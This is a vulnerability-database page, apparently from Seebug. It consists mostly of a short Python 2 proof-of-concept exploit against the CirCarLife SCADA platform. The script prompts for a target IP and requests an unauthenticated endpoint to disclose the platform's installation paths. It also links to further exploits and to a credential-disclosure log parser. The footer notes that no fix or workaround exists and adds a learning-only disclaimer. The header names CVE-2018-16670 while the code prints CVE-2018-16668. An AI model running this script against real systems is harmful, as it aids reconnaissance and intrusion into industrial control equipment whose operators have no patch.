#POC for CVE-2018-16670 #More POCs and complete log parser for credentials and system specifications disclosure at https://github.com/SadFud/Exploits/tree/master/Real%20World/SCADA%20-%20IOT%20Systems import requests from termcolor import colored def repository(): print colored('[*] Getting installation paths via CVE-2018-16668', 'blue') path = requests.get(target1 + '/html/repository') rutas = path.text.encode("utf8").split('\n') platformpath = rutas[1].split(' ') platformpath = platformpath[0] appsrc = rutas[3] appsrc = rutas[3].split(' ') appsrc = appsrc[0] raiz = str(appsrc).find('/circarlife/') appsrc = appsrc[0:raiz+len('/circarlife/')] print colored('[+] Platform installation path retrieved succesfully', 'green') print colored('[+] Platform installation path: ', 'green' ) + platformpath print colored('[+] Applicaction installation path: ', 'green') + appsrc url = raw_input('Insert target ip: ') target1 = 'http://' + url repository()
暂无临时解决方案
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论